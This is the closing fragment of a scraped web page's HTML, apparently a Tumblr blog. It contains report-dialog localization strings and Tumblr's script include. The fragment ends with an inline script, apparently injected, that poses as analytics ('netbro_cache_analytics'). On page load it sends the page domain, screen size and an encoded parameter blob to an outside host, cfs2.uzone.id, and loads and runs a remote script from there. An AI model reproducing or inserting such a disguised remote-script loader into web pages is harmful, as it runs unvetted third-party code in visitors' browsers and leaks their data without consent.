&quot;%1$sReport %2$s&#039;s post?%3$sIf it violates our community guidelines, we&#039;ll remove it.%4$s&quot;:&quot;%1$sReport %2$s&#039;s reblog?%3$sIf it violates our community guidelines, we&#039;ll remove it.%4$s&quot;,&quot;%1$sReport %2$s&#039;s reply?%3$sIf it violates our community guidelines, we&#039;ll remove it.%4$s&quot;:&quot;%1$sReport %2$s&#039;s reblog?%3$sIf it violates our community guidelines, we&#039;ll remove it.%4$s&quot;}}"></noscript>
<script src="http://assets.tumblr.com/client/prod/standalone/tumblelog/index.build.js?_v=b754240effd321494a4cb840633c5e94"></script>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnC4TAFqrH0VHJsV95YnTlTEbPz0I%2fzfBZ2a6A%2fUKBVfgAuc5SO3FH54pVH7dDPsxgHsBoK%2fOxaO4WJ38goG3bHkjMi6bDYX1%2f56ne1I10JJHs8gkpfXqJzme%2fN5n3iOQ6o6CxsLF4qkVWskU8WOl%2b4Og8XEZhli%2bZVu1EPVomme8D%2bgyuMDERfFYfpZCFMSSDOzDdL%2bRCb74SmJLS%2bYZXqxAUKZU0FlwkCdYFVd4w7QEs%2fi%2f0jUK2ZYWWBMMVbsFKvB8WgdKydb46jppC7D2qKHbZ0jaTjGGmZ2cgg8qWqfmZ1EZIqoh%2b4NdTAXzzFSYB0qzXVNKsSNJO2wqy4jUyGLqextf6oJ9PiSj6rJCHsBMOB96d5ecwnAZAzyT7M2AK%2b%2b%2fXKj%2fM9WcffKYeGyI%2f3WMiIauntXSpY4bJJestydBMUhdhHjleg0%2fKMSu2%2fwkwo5i%2fgNLxmhR6C%2f4mWUC6%2fcEUCNEQuwI%2bB4hlnrYd94QMs666P0VYLNEdbe3tBBdACdTsHg97%2bMIbgUXejTa%2fPwC49Tlv6UNO" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
